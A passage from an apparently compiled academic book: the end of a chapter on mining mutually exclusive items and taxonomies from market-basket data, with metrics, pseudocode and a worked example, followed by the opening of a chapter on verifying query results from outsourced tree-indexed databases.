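    s_ab = sum(1 for t in sub if a in t and b in t) / len(sub)
    if min(s_a, s_b) == 0:
        return 0.0
    return (s_a + s_b - 2 * s_ab) * (1 - s_ab / min(s_a, s_b))

With the market basket data of Table 2 (later in this article) and I = {sugar}, the pair (espresso, cappuccino) gives S_A = 3/7, S_B = 2/7, and S_AB = 0, so the Local MEM equals 5/7 ≈ 0.714, the value reported in Table 4.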
For the above formula P(I) = 1. S_X is the fraction of transactions that contain X over the number of transactions that contain I. Figure 2 shows that the Local MEM increases linearly when the local support of A and B increases, as long as there is no overlapping (S_A, S_B < 0.5 and S_AB = 0), until it reaches its maximum value, which is 1. We assume that S_A = S_B for simplicity, without any loss of generality. When the overlapping starts (S_A, S_B > 0.5), it drops quickly to zero, because even a small degree of overlapping is strong evidence against the possibility of two items being mutually exclusive. An illustrative example is depicted in Figure 3. In diagrams (a) and (b), the shadowed areas represent the transactions that support A but not B (or A−B) and B but not A (or B−A), which is the first factor in the Local MEM formula. The second factor in the Local MEM equation is represented by the minimum of (A−B)/A and (B−A)/B. The two items in diagram (b) are less likely to be mutually exclusive than in (a).

Global metric. We propose the following global metric (Equation 3) for the evaluation of a candidate pair of mutually exclusive items that is supported by a set IS of frequent itemsets.

GM1(A, B) = IIF · Σ_{I∈IS} S_I · LM_I(A, B)    (3)
Figure 3. Venn diagrams for two items A and B, with the regions A−B and B−A shaded in panels (a) and (b)
Table 1. The mutually exclusive items mining algorithm

Input: A multiset of transactions D, a minimum global support threshold min_gsup, a minimum local support threshold min_lsup, and a minimum global MEM threshold min_gMEM.
Output: All mutually exclusive pairs.
FI ← mineFrequentItemsets(D, min_gsup)
for each (T ∈ D)
    for each (I ∈ FI)
        if (I ⊆ T)
            for each (E ∈ T-I)
                Extensions(I) ← Extensions(I) ∪ E
                Count[I][E] ← Count[I][E] + 1
for each (I ∈ FI)
    for each (E ∈ Extensions(I))
        if (Count[I][E] < min_lsup)
            Extensions(I) ← Extensions(I) - E
for each (T ∈ D)
    for each (I ∈ FI)
        for each (E1, E2 ∈ Extensions(I))
            if ({E1, E2} ⊆ T)
                ExtensionPairs(I) ← ExtensionPairs(I) ∪ {E1, E2}
                Local_MEM[I][{E1, E2}] ← calculateLocal_MEM(I, {E1, E2})
for each (I ∈ FI)
    for each (EP ∈ ExtensionPairs(I))
        AllExtensionPairs ← AllExtensionPairs ∪ EP
for each (EP ∈ AllExtensionPairs)
    if (Global_MEM(EP) ≥ min_gMEM)
        MutuallyExclusivePairs ← MutuallyExclusivePairs ∪ EP
return MutuallyExclusivePairs
IIF stands for itemset independence factor and is calculated as the ratio of the number of the distinct items contained in all itemsets that support a candidate pair over the total number of items contained in these itemsets. For example, the IIF of the itemsets {A, B, C} and {A, D} is
0.8, since there are four distinct items (A, B, C, and D) over a total of five (A, B, C, A, and D). The IIF is used in order to take into account the possible overlapping of two candidate mutually exclusive items. We do this because the overlapping between the transactions that contain two
different itemsets implies overlapping between the transactions that contain the pair. Alternatively, one can use Equation 4, which is a normalized version of Equation 3. The range of values of GM1 is [0, +∞), while the range of GM2 is [0, 1].
GM2(A, B) = IIF · [ Σ_{I∈IS} S_I · LM_I(A, B) ] / max_{IS∈FS} ( Σ_{I∈IS} S_I )    (4)
FS is the set that contains all the sets of frequent itemsets that support a candidate pair of mutually exclusive items. The difference between Equations 3 and 4 is the denominator in Equation 4. This term is used in order to normalize the metric, since the numerator is always less than or equal to the denominator. In other words, for each candidate pair we calculate the sum of the supports of the frequent itemsets that support the pair. The greatest sum is used to normalize the metric. This normalization is useful to the user who wants to know a priori the maximum value of the metric in order to use the proper threshold. However, this is not desirable when the user wants to compare the results of different data sets or the results obtained by running the algorithm with different parameters. The algorithm for mining mutually exclusive pairs of items is presented in Table 1. For the first step, namely the discovery of frequent itemsets, every frequent itemset mining algorithm can be used.
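Continuing the sketch (illustrative only; the dictionaries gsup and lmem are assumed to have been filled by the earlier steps, e.g., by any frequent itemset miner plus the local_mem function above), the itemset independence factor and the global metrics GM1 and GM2 can be computed as follows.

def iif(supporting_itemsets):
    # Ratio of distinct items to total items over all itemsets supporting the pair;
    # e.g., [{A, B, C}, {A, D}] gives 4 distinct items out of 5, i.e., IIF = 0.8.
    all_items = [i for I in supporting_itemsets for i in I]
    return len(set(all_items)) / len(all_items)

def global_mem(supporting_itemsets, gsup, lmem, max_sum=None):
    # GM1 (Equation 3); pass max_sum to obtain the normalised GM2 (Equation 4).
    #   gsup[I] : global support of frequent itemset I
    #   lmem[I] : Local MEM of the candidate pair in the I-subspace
    #   max_sum : the largest sum of supports over the supporting itemsets of any pair
    weighted = sum(gsup[I] * lmem[I] for I in supporting_itemsets)
    if max_sum is None:
        return iif(supporting_itemsets) * weighted        # GM1, range [0, +inf)
    return iif(supporting_itemsets) * weighted / max_sum  # GM2, range [0, 1]

# Example consistent with Table 4: the pair (espresso, cappuccino) is supported only by {sugar},
# so global_mem([frozenset({"sugar"})], {frozenset({"sugar"}): 7/9}, {frozenset({"sugar"}): 5/7})
# returns 5/9.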
Example

The following tables show an illustrative example. Table 2 contains a market basket data set example, and Table 3 the discovered association rules. The minimum support was set to 2/9 in order to extract these rules. After we applied our algorithm, we discovered the mutually exclusive pairs of items shown in Table 4, along with their metrics and corresponding frequent itemsets.
Table 2. A market basket dataset example

TID   Items in the basket
1     espresso, sugar, newspaper
2     espresso, sugar, cola
3     espresso, sugar
4     cappuccino, cigarettes
5     cappuccino, sugar
6     cappuccino, sugar, sweets
7     decaf, sugar, chewing_gum
8     decaf, soda, vinegar
9     decaf, sugar, cigarettes
Table 3. Association rules mined from the data set of Table 2

Association rules      Support   Confidence
espresso ⇒ sugar       3/9       1
decaf ⇒ sugar          2/9       2/3
cappuccino ⇒ sugar     2/9       2/3
EXPERIMENTS

In order to evaluate the performance of our algorithm, we conducted a number of experiments on an IBM artificial market basket data set (T10I4D100K). This data set contains 100,000 transactions. The graph in Figure 4 illustrates the performance of our mutually exclusive items mining algorithm in terms of run time (seconds), while the min_lsup threshold varies from 0.1 to 0.3 and the min_gsup threshold varies from 0.01 to 0.04. As expected, we observe that as the min_lsup threshold and the min_gsup threshold decrease, the run time of the algorithm increases. The performance degrades significantly when the two thresholds are set very low.
Table 4. Mutually exclusive items and their corresponding frequent itemsets mined from the data set of Table 2

Mutually exclusive pairs (gMEM, gsup)   Frequent itemsets: support   Local MEM
{espresso, cappuccino}: 5/9, 0          {sugar}: 7/9                 0.714
{espresso, decaf}: 5/9, 0               {sugar}: 7/9                 0.714
{cappuccino, decaf}: 4/9, 0             {sugar}: 7/9                 0.571
Figure 4. Run time (in seconds) of the mutually exclusive items mining algorithm as min_lsup varies from 0.1 to 0.3, for four fixed values of min_gsup (0.01, 0.02, 0.03, and 0.04)
DISCUSSION

We apply a level-wise technique in order to extract the contiguous frequent itemsets and then the mutually exclusive items. The intuition behind this approach is twofold: First, if these extensions are indeed frequent in the subspace of a frequent itemset, then there could be important information about these itemsets lost for a number of reasons. Second, if a large number of itemsets share the same extensions and these common extensions are frequent in the subspace of these itemsets, then they are likely to be mutually exclusive and possibly of the same category and the same level of taxonomy. In such cases, the total support of
the parent node in the taxonomy is broken down into many lower-level supports, which are not high enough to satisfy the minimum threshold that was set, which explains the possible loss of potentially valuable knowledge. The support of the current itemset is reduced because of the low support of the extensions, and it eventually fails to qualify as a frequent itemset. When no taxonomy information is available in advance, the information gathered from this process can be a valuable hint about the taxonomy effect explained here and, eventually, about the existence of a taxonomy. Mining a transaction database to discover the underlying taxonomy is an elusive task with questionable results. In the existing applications,
the existence of taxonomy assists the miner in discovering valuable knowledge. In our setup, the "Holy Grail" would be exactly the inverse procedure. In a mining problem where no taxonomy information is provided in advance, is it possible to follow a kind of reverse engineering procedure in order to mine nuggets of taxonomy information from the data? If so, then the benefit would be twofold. First, the domain expert would be provided with pieces of potentially valuable knowledge about concept hierarchies among items in the database. Second, this knowledge could be used again to mine for multiple-level or generalized association rules, especially those hierarchical relationships that the expert verifies or wants to test for validity. The knowledge that two items are mutually exclusive can be further analyzed in order to decide whether the two products could be included in the same level of taxonomy and under the same parent node. Searching for mutually exclusive pairs of items in a "blind" manner would produce a huge number of candidate pairs. Moreover, most of the discovered mutually exclusive items would be uninteresting. The intuition behind searching for mutually exclusive items between the extensions of frequent itemsets is twofold. First, the search space is reduced considerably, and second, a frequent itemset represents a class of consumers that have particular preferences. So, the mutually exclusive items found in the subspace of a frequent itemset are probably more interesting. For example, consider a large store that sells clothes,
shoes, sportswear, and so forth. Also, consider that itemset A = {Socks, AthleticShoes, Rackets} represents athletes who play tennis, and itemset B = {Socks, AthleticShoes, Handball} represents athletes who play handball. Itemsets A and B may not have high support, while itemset C = A∩B = {Socks, AthleticShoes} is more likely to have higher support, since it represents the whole class of athletes. However, the two items, Rackets and Handball, are expected to be locally frequent in the subset of transactions containing C. The use of traditional association rules does not provide the alternative of exploring the C-subspace, and consequently, a large amount of potentially valuable knowledge will remain hidden. Conversely, with our algorithm, Rackets and Handball would be discovered as mutually exclusive items, indicating a taxonomical relationship. The taxonomy generation is needed in many domains. Although taxonomies already exist, they may require refinement either because the consumers' preferences change over time, because new products are produced, or even because some considerations made when the taxonomy was built were false. Moreover, consumers' preferences vary in different locations and consequently the taxonomies are different. For example, a taxonomy used in a supermarket in a highland place is not appropriate for a supermarket located near the sea. Finally, many different taxonomies can be built for a set of items depending on the various viewpoints. Returning to the example, maybe there is not any taxonomy containing Rackets and
Figure 5. A taxonomy of coffee products: Coffee is the parent of Espresso, Cappuccino, and Decaf

Table 5. Generalized association rules, using the taxonomy discovered

Association rules   Support   Confidence
sugar ⇒ coffee      7/9       1
coffee ⇒ sugar      7/9       7/9
Handball at the same level and under the same parent node. Probably, a new taxonomy should be created or an old one should be refined. Now, let us return to the example. The extracted mutually exclusive pairs of items listed in Table 4 are all different types of coffee (espresso, cappuccino, and decaffeinated). If we consider them as items of the same level of taxonomy (Figure 5) and replace these items with a single item (the parent node, i.e., coffee), we are able to increase the minimum support threshold in order to acquire stronger association rules (Table 5).
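The effect of this replacement can be reproduced with a short sketch (illustrative only): roll the three coffee items of Table 4 up to a single hypothetical parent item and recompute support and confidence on the transactions of Table 2, which yields exactly the generalized rules of Table 5.

def generalize(transactions, children, parent):
    # One level of taxonomy roll-up: replace every child item by its parent.
    return [frozenset(parent if i in children else i for i in t) for t in transactions]

def support_confidence(transactions, lhs, rhs):
    n = len(transactions)
    lhs, both = frozenset(lhs), frozenset(lhs) | frozenset(rhs)
    sup_lhs  = sum(1 for t in transactions if lhs <= t)
    sup_both = sum(1 for t in transactions if both <= t)
    return sup_both / n, sup_both / sup_lhs

# The market basket data of Table 2:
db = [frozenset(t) for t in (
    {"espresso", "sugar", "newspaper"}, {"espresso", "sugar", "cola"}, {"espresso", "sugar"},
    {"cappuccino", "cigarettes"}, {"cappuccino", "sugar"}, {"cappuccino", "sugar", "sweets"},
    {"decaf", "sugar", "chewing_gum"}, {"decaf", "soda", "vinegar"}, {"decaf", "sugar", "cigarettes"})]

rolled = generalize(db, {"espresso", "cappuccino", "decaf"}, "coffee")
print(support_confidence(rolled, {"sugar"}, {"coffee"}))  # (7/9, 1)   -> sugar => coffee
print(support_confidence(rolled, {"coffee"}, {"sugar"}))  # (7/9, 7/9) -> coffee => sugar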
CONCLUSION

In this article, we have presented the novel problem of mining for mutually exclusive items, as an extension to the association rules mining paradigm. When two items are mutually exclusive, this can be used as a valuable hint when looking for previously unknown taxonomical relationships among them. In such a case, this can be an interesting type of knowledge to the domain expert, but more importantly, it can be used to mine the database for hierarchical or generalized association rules. For this purpose, we proposed an intuitive approach and formulated the problem, providing definitions of terms and evaluation metrics. We have also developed a mining algorithm, which extends Apriori, and we have applied it on a large synthetic dataset in order to test its performance. In the future, we would like to apply our approach on real-world data sets in order to further investigate its performance.
REFERENCES

Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In Proceedings of the ACM SIGMOD Conference on Management of Data (pp. 207-216).

Agrawal, R., Mannila, H., Srikant, R., Toivonen, H., & Verkamo, A. I. (1996). Fast discovery of association rules. In U. M. Fayyad, G. Piatetsky-Shapiro, P. Smyth, & R. Uthurusamy (Eds.), Advances in knowledge discovery and data mining (pp. 307-328). Menlo Park, CA: AAAI Press.

Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules in large databases. In Proceedings of the International Conference on Very Large Databases (pp. 487-499).

Berberidis, C., Angelis, L., & Vlahavas, I. (2004). PREVENT: An algorithm for mining intertransactional patterns for the prediction of rare events. In Proceedings of the 2nd European Starting AI Researcher Symposium (pp. 128-136).

Berberidis, C., Tzanis, G., & Vlahavas, I. (2005). Mining for contiguous frequent itemsets in transaction databases. In Proceedings of the IEEE 3rd International Workshop on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications.

Chen, X., & Petrounias, I. (2000). Discovering temporal association rules: Algorithms, language and system. In Proceedings of the 16th International Conference on Data Engineering.

Han, J., & Fu, Y. (1994). Dynamic generation and refinement of concept hierarchies for knowledge discovery in databases. In AAAI Workshop on Knowledge Discovery in Databases (pp. 157-168).

Han, J., & Fu, Y. (1995). Discovery of multiple-level association rules from large databases. In Proceedings of the 21st International Conference on Very Large Databases (pp. 420-431).

Han, J., Pei, J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In Proceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 1-12).

Koperski, K., & Han, J. (1995). Discovery of spatial association rules in geographic information databases. In Proceedings of the 4th International Symposium on Large Spatial Databases (pp. 47-66).

Mannila, H., Toivonen, H., & Verkamo, A. I. (1994). Efficient algorithms for discovering association rules. In Proceedings of AAAI Workshop on Knowledge Discovery in Databases (pp. 181-192).

Savasere, A., Omiecinski, E., & Navathe, S. B. (1998). Mining for strong negative associations in a large database of customer transactions. In Proceedings of the 14th International Conference on Data Engineering (pp. 494-502).

Srikant, R., & Agrawal, R. (1995). Mining generalized association rules. In Proceedings of the 21st VLDB Conference (pp. 407-419).

Teng, C. M. (2002). Learning from dissociations. In Proceedings of the 4th International Conference on Data Warehousing and Knowledge Discovery (pp. 11-20).

Thomas, S., & Sarawagi, S. (1998). Mining generalized association rules and sequential patterns using SQL queries. In Proceedings of the 4th International Conference on Knowledge Discovery and Data Mining (pp. 344-348).

Tung, A. K. H., Lu, H., Han, J., & Feng, L. (2003). Efficient mining of intertransaction association rules. IEEE Transactions on Knowledge and Data Engineering, 15(1), 43-56.

Wu, X., Zhang, C., & Zhang, S. (2004). Efficient mining of both positive and negative association rules. ACM Transactions on Information Systems, 22(3), 381-405.
This work was previously published in International Journal of Data Warehousing and Mining, Vol. 3, Issue 3, edited by D. Taniar, pp. 45-59, copyright 2007 by IGI Publishing (an imprint of IGI Global).
Chapter 7.15
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data

Tran Khanh Dang, National University of Ho Chi Minh City, Vietnam
ABSTRACT

In an outsourced database service model, query assurance takes an important role among well-known security issues. To the best of our knowledge, however, none of the existing research work has dealt with ensuring the query assurance for outsourced tree-indexed data. To address this issue, the system must prove authenticity and data integrity, completeness, and freshness guarantees for the result set. These objectives imply that data in the result set originated from the actual data owner and has not been tampered with; the server did not omit any tuples matching the query conditions; and the result set was generated with respect to the most recent snapshot of the database. In this paper, we propose a vanguard solution to provide query assurance for outsourced tree-indexed data on untrusted servers with high query assurance and at reasonable costs. Experimental results with real datasets confirm the efficiency of our approach and theoretical analyses.
INTRODUCTION

Outsourcing database services is emerging as an important new trend thanks to continued growth of the Internet and advances in the networking technology. Organizations outsource their data management needs to an external service provider, thereby freeing them to concentrate on their core business. In this outsourced database service (ODBS) model, organizations rely on the premises of external service providers, which include hardware, software, and manpower, for the storage and retrieval management of their data, and they operate other business applications via the Internet without having to maintain applications in-house. Figure 1 depicts key "actors" in
Figure 1. The ODBS model and security threats at the server side: data owner(s) and clients access the outsourced database hosted on an untrusted server over the Internet, and the server is exposed to both inside and outside attackers.
the most general and complicated ODBS model (Mykletun, Narasimha, & Tsudik, 2004),1 where multiple data owners (say, separate departments of an organization) outsource their data to a certain database server (which may be untrusted) and allow users (may be other departments, partners of the organization, or even themselves) to access the outsourced data. This service model is a recent and important manifestation of the outsourcing trend of different information technology services. As we can see, however, among issues needing to be addressed in order to make this model reality, security-related issues must be of crucial concern due to the fact that the server may be untrusted, and both data as well as users’ queries can now be exposed to the server and hackers/malicious users (corresponding to inside and outside attackers as shown in Figure 1, respectively). This means that, in this ODBS model, apart from secure network communication channels and other necessary security procedures at the user side (Axelrod, 2004), efficient and effective solutions to security threats inside the server are indispensable. We discuss in more detail these server-side security-related issues below.
Security Issues in the ODBS Model

Since a service provider is typically not fully trusted, the ODBS model raises numerous interesting research challenges related to security issues. First of all, because the life-blood of every organization is the information stored in its databases, making outsourced data confidential is therefore one of the foremost challenges in this model. In addition, privacy-related concerns must also be taken into account due to their important role in real-world applications.2 Not less importantly, in order to make the outsourced database service viable and really applicable, the query result must also be proven qualified. This means the system has to provide users with some means to verify the query assurance claims of the service provider. Overall, the most crucial security-related research questions in the ODBS model relate to the below issues:

• Data confidentiality: Outsiders and the server's operators (database administrator, DBA) cannot see the user's outsourced data contents in any cases (even as the user's queries are performed on the server).
• User privacy: Users do not want the server and even the DBA to know about their queries and the results. Ensuring the user privacy is one of the keys to the ODBS model's success.
• Data privacy: Users are not allowed to get more information than what they are querying on the server. In many situations, users must pay for what they have got from the server and the data owner does not allow them to get more than what they have paid for, or even users do not want to pay for what they do not need because of the low bandwidth connections, limited memory/storage devices, and so forth. This security objective is not easy to obtain and a cost-efficient solution to this issue is still an open question (Dang, 2006b).
• Query assurance: Users are able to verify the correctness (authenticity and data integrity), completeness, and freshness of the result set. Among all security objectives, the query assurance is always appealing in the ODBS model. We succinctly explain these concepts as follows, and more discussions can be found in Narasimha and Tsudik (2006), Mykletun et al. (2004), Boneh, Gentry, Lynn, and Shacham (2003), Pang and Tan (2004), Pang, Jain, Ramamritham, and Tan (2005), and Sion (2005):
  ◦ Proof of correctness: As a user queries outsourced data, it expects a set of tuples satisfying all query conditions and also needs assurance that data returned from the server originated from the data owner and have not been tampered with either by an outside attacker or by the server itself.
  ◦ Proof of completeness: As a user queries outsourced data, completeness implies that the user can verify that the server returned all tuples matching all query conditions, that is, the server did not omit any tuples satisfying the query conditions. Note that a server,
which is either malicious or lazy, might not execute the query over the entire database and might return no or only partial results. Ensuring the query result completeness aims to detect this unexpected behavior.
  ◦ Proof of freshness: The user must be ensured that the result set was generated with respect to the most recent snapshot of the database. This issue must be addressed so as to facilitate dynamic outsourced databases, which frequently have updates on their data.

The above security requirements differ from the traditional database security issues (Castano, Fugini, Martella, & Samarati, 1995; Umar, 2004) and will in general influence the performance, usability, and scalability of the ODBS model. Although there exist a number of research works on the above topics (e.g., Du & Atallah, 2000; Hacigümüs, Iyer, Li, & Mehrotra, 2002a; Bouganim & Pucheral, 2002; Damiani, Vimercati, Jajodia, Paraboschi, & Samarati, 2003; Lin & Candan, 2004; Chang & Mitzenmacher, 2004; Dang, 2006a, 2006b), to the best of our knowledge, none of them has dealt with the problem of ensuring query assurance for outsourced tree-indexed data. It has been clearly proven in the literature that tree-indexed data have played an important role in both traditional and modern database applications (Dang, 2003). Therefore, security issues in query assurance for outsourced tree-indexed data need to be addressed completely in order to materialize the ODBS model. This is even then not a trivial task, especially as tree-based index structures are outsourced to untrusted servers (Du & Atallah, 2000; Dang, 2005). In this article, we will discuss and propose solutions to security issues in order to provide query assurance for dynamic outsourced databases that come together with tree-based index structures. Our techniques allow users to operate on their outsourced tree-indexed data on untrusted servers with high query
assurance and at reasonable costs. Our proposed solutions will address all three desired security properties of query assurance. In addition, as presented in Du and Atallah (2000), Mykletun et al. (2004), and Dang (2006b), there are a number of different ODBS models depending on desired security objectives. In this article, however, due to the complexity of the overall problem, we will focus on the most basic and typical ODBS model, where only data confidentiality, user privacy, and query assurance objectives should be taken into account. Our holistic solution allows users (also the data owners in our considered ODBS model) to manipulate their outsourced data as if it were stored in in-house database servers. The rest of this article is organized as follows. We briefly summarize the main related work and introduce a state-of-the-art approach to managing outsourced tree-indexed data without query assurance considerations. After that, we present our contributions to completely solve the problem of query assurance in dynamic outsourced tree-indexed data. We then show experimental results with real datasets and brief security analyses
in order to establish the practical value of our proposed solutions. Finally, the last section gives conclusions and future work.
RELATED WORK

Although various theoretical problems concerning computation with encrypted data and searching on encrypted data have appeared in the literature (Fong, 2003), the ODBS model, which heavily depends on data encryption methods, emerged not long ago (Du & Atallah, 2000; Hacigümüs, Mehrotra, & Iyer, 2002b; Dang, 2006b). Even then it rapidly got special attention from the research community due to the variety of conveniences it brings as well as the interesting research challenges it raises (Dang, 2005). The foremost research challenge relating to security objectives for the model was introduced in the previous section. In Figure 2 we diagrammatically summarize security issues in the ODBS model, together with major references to the corresponding state-of-the-art solutions.
Figure 2. Security issues in the ODBS model: confidentiality (Bouganim et al., 2002; Damiani et al., 2003; Dang, 2005); privacy, comprising user privacy (Hacigümüs et al., 2002a; Lin et al., 2004; Chang et al., 2004; Dang, 2006a) and data privacy (Gertner et al., 1998; Du et al., 2000; Dang, 2006b); query assurance, comprising correctness (Boneh et al., 2003; Mykletun et al., 2004; Pang et al., 2004; Pang et al., 2005; Narasimha et al., 2006; Sion, 2005; Nguyen et al., 2007; this paper), completeness (Pang et al., 2005; Narasimha et al., 2006; Sion, 2005; Nguyen et al., 2007; this paper), and freshness (this paper); and auditing (Burmester et al., 2004; Dang, 2006b). The ODBS model itself is described in Du et al. (2000), Hacigümüs et al. (2002b), and Dang (2006b).
As shown in Figure 2, most security objectives of the ODBS model have been investigated. To deal with the data confidentiality issue, most approaches encrypt the (outsourced) data before it is stored at the external server (Bouganim & Pucheral, 2002; Damiani et al., 2003; Dang, 2005). Although this solution can protect the data from outsiders as well as the server, it introduces difficulties in the querying process, as it is hard to ensure the user and data privacy when performing queries over encrypted data. In general, to address the privacy issue (including both user and data privacy), outsourced data structures (tree or non-tree based) that are employed to manage the data storage and retrieval should be considered. Notably, the problem of user privacy has been well solved, even without special hardware (Smith & Safford, 2001), if the outsourced database contains only encrypted records and no tree-based indexes are used for storage and retrieval purposes (see Dang, 2006b, for an overview). Conversely, the research results are less satisfactory if such trees are employed, although some proposals have been made recently (Lin & Candan, 2004; Dang, 2006b). In our previous work (Dang, 2006b), we did propose an extreme protocol for the ODBS model based on private information retrieval (PIR)-like protocols (Asonov, 2001). It would, however, become prohibitively expensive if only one server were used to host the outsourced data (Chor, Goldreich, Kushilevitz, & Sudan, 1995). Damiani et al. (2003) also gave a solution to query outsourced data indexed by B+-trees, but their approach does not provide an oblivious way to traverse the tree, and this may lead to compromised security objectives (Lin & Candan, 2004; Dang, 2006a). Lin and Candan (2004) introduced a computational complexity approach to solve the problem, with sound experimental results reported. Their solution, however, only supports oblivious search operations on outsourced search trees, not insert, delete, and modification ones. That means their solution cannot be applied to dynamic outsourced search trees where several items may
be inserted into and removed from, or existing data can be modified. In our recent work (Dang, 2006a), we analyzed and introduced techniques to completely solve the problem of data confidentiality and user privacy, but not query assurance, in the ODBS model with dynamic tree-indexed data support. In the next sections we will elaborate on these techniques and extend them in order to deal with the three security objectives of query assurance as mentioned above. Contrary to user privacy, although there are initial research activities (Gertner, Ishai, Kushilevitz, & Malkin, 1998; Du & Atallah, 2000; Dang, 2006b), the problem of data privacy still needs much more attention. Gertner et al. (1998) first considered the data privacy issue in the context of PIR-like protocols and proposed the so-called SPIR, symmetrical PIR, protocol in order to prevent users from knowing more than the answers to their queries. Unfortunately, such PIR-based approaches cannot be applied to the ODBS model because the data owners in PIR-like protocols are themselves the database service providers. Du and Atallah (2000) introduced protocols for secure remote database access with approximate matching with respect to four different ODBS models requiring different security objectives among those presented in the previous section. Even so, their work did not support outsourced tree-indexed data. In our recent work (Dang, 2006b), we presented a solution to ensuring data privacy in the ODBS model which can be applied to tree-indexed data as well. Nevertheless, our proposed solution must resort to a trusted third party, which is not easy to find in practice. Recently, addressing the three issues of query assurance has also attracted many researchers and, as a result, a number of solutions have been proposed (e.g., Boneh et al., 2003; Mykletun et al., 2004; Pang & Tan, 2004; Pang et al., 2005; Narasimha & Tsudik, 2006; Sion, 2005; Nguyen, Dang, Son, & Kueng, 2007). We must note that, even now, none of them has given a solution to the problem of guaranteeing the query result
Ensuring Correctness, Completeness, and Freshness for Outsourced Tree-Indexed Data
freshness (see Figure 2).3 To prove the correctness of a user’s query results, the state-of-the-art approaches (Boneh et al., 2003; Mykletun et al., 2004; Pang & Tan, 2004; Sion, 2005) employed some aggregated/condensed digital signature scheme to reduce the communication and computation costs. First, Boneh et al. (2003) introduced an interesting aggregated signature scheme that allows aggregation of multiple signers’ signatures generated from different messages into one short signature based on elliptic curves and bilinear mappings. This scheme was built based on a “Gap Diffie-Hellman” group where the Decisional Diffie-Hellman problem is easy while the Computational Diffie-Hellman problem is hard (Joux & Nguyen, 2001). Despite the big advantage that this scheme can be applied to different ODBS models, it must bear a disadvantage related to the performance. As shown in Mykletun et al. (2004), the computational complexity of Boneh et al.’s (2003) scheme is quite high for practical uses in many cases. Second, Mykletun et al. (2004) introduced a RSA-based condensed digital signature scheme that can be used for ensuring authenticity and data integrity in the ODBS model. Their scheme is concisely summarized as follows.
Condensed-RSA Digital Signature Scheme

Suppose pk = (n, e) and sk = (n, d) are the public and private keys, respectively, of the RSA signature scheme, where n is a k-bit modulus formed as the product of two k/2-bit primes p and q. Assume φ(n) = (p-1)(q-1); both the public and private exponents e, d ∈ Zn* and must satisfy ed ≡ 1 mod φ(n). Given t different messages {m1, ..., mt} and their corresponding signatures {s1, ..., st} that are generated by the same signer, a condensed-RSA signature is computed as follows: s1,t = ∏(i=1..t) si mod n. This signature is of the same size as a single standard RSA signature. To verify the correctness of t received messages, the user must multiply
the hashes of all t messages and check that (s1,t)^e ≡ ∏(i=1..t) h(mi) mod n. As we can see, the above scheme is possible due to the fact that RSA is multiplicatively homomorphic (a small illustrative sketch of this aggregation is given at the end of this section). We will apply this scheme to our ODBS model in order to provide correctness guarantees of the received tree nodes from the server (see the section on "Correctness Guarantees"). Note, however, that this scheme is applicable only for a single signer's signatures. Sion (2005) also employed this approach to deal with the correctness of query results in his scheme. Besides, Pang and Tan (2004) applied and modified the idea of "Merkle Hash Trees" (MHT) (Merkle, 1980) to provide a proof of correctness for edge computing applications, where a trusted central server outsources parts of the database to proxy servers located at the edge of the network. In Narasimha and Tsudik (2006), however, the authors pointed out possible security flaws in this approach. Furthermore, there are also some approaches to deal with the completeness of a user's query results (Sion, 2005; Pang et al., 2005; Narasimha & Tsudik, 2006). First, Sion (2005) proposed a solution to provide such assurances for arbitrary queries in outsourced database frameworks. The solution is built around a mechanism of runtime query "proofs" in a challenge-response protocol. More concretely, before outsourcing the data, the data owner partitions its data into k segments {S1, ..., Sk}, computes hashes for each segment, H(Si), i = 1, ..., k, then stores (outsources) them all together at the service provider's server. In addition, the data owner also calculates some "challenge tokens" with respect to Si. Actually, the challenge tokens are queries whose results the data owner already knows, and they can be used for verification later. Whenever a batch of queries is sent to the server, certain challenge token(s) are also sent together. The result set is then verified using the challenge tokens for its completeness. Although this approach can be applied to different query types, not 100% of the query assurance (the
completeness) can be guaranteed because there are chances for a malicious server to "get away" with cheating in the query execution phase (i.e., the server only needs to "guess" and return the correct answer to the challenge token together with fake result sets for other queries in the batch, but nothing else). Moreover, this approach also introduces cost inefficiency for database updates because the challenge answers must be recalculated. More seriously, although the author did not aim to address the user privacy issue in the article, we should note that user privacy in this approach may be compromised because the server knows what data segments are required by the user, so inference and linking attacks can be conducted (Dang, 2006b; Damiani et al., 2003). Second, Pang et al. (2005) introduced a solution based on aggregated signature schemes and MHT to provide the completeness of the query result. This approach is an extension of that presented in their previous work (Pang & Tan, 2004), which has been proven insecure due to some possible security flaws (Narasimha & Tsudik, 2006). Last, Narasimha and Tsudik (2006) developed an approach, called digital signature aggregation and chaining (DSAC), which achieves both correctness and completeness of query replies. However, in their approach, tuples must be pre-sorted in ascending order with respect to each searchable dimension for calculation of the signature chain, and thus it still does not support outsourced tree-indexed data, where the order of tree nodes' contents cannot be determined. This pre-sorting requirement also has a tremendous negative impact on data updates, and hence the total performance of the system will degrade. Apart from the security issues mentioned above and in the previous section, as we can observe in Figure 2, there exists another question: How can the server conduct auditing activities in systems provided with such security guarantees (without employing special hardware equipment)? The server may not know who is accessing the system (e.g., Dang, 2006b), what they are asking
for, or what the system returns to the user, and thus how it can effectively and efficiently tackle accountability or develop intrusion detection/prevention systems. The goals of privacy preservation and accountability appear to be in contradiction, and an efficient solution that balances the two is still open. More discussion of this topic can be found in Burmester, Desmedt, Wright, and Yasinsac (2004). In the next section we will elaborate on the state-of-the-art approach proposed in Dang (2006a) to managing the storage and retrieval of dynamic outsourced tree-indexed data, and in the section after that we will extend this approach to strengthen it with query assurance support, covering all three of the security objectives of concern.
A PRAGMATIC APPROACH TO MANAGING OUTSOURCED TREE-INDEXED DATA

As discussed in the literature, tree-based index structures play an indispensable role in both traditional and modern database applications (Dang, 2003). In spite of their advantages, however, these index structures introduce a variety of difficulties in the ODBS model (Du & Atallah, 2000; Dang, 2006b). To illustrate the problem, Figure 3a shows an example of the B+-tree for an attribute CustomerName with sample values. All tree nodes are encrypted before being stored at the outsourcing server to ensure data confidentiality. Assume that a user queries this tree for all customers whose name is Ha. Without a secure mechanism for query processing, the query accesses nodes 0, 1, and 5 in sequence, and this access pattern is revealed to the server. The server thereby also learns that node 0 is the root, node 1 an internal node, and node 5 a leaf node of the tree, so user privacy is compromised. More seriously, using such information collected
Figure 3. An example of the B+-tree (a) and the corresponding plaintext and encrypted table (b)

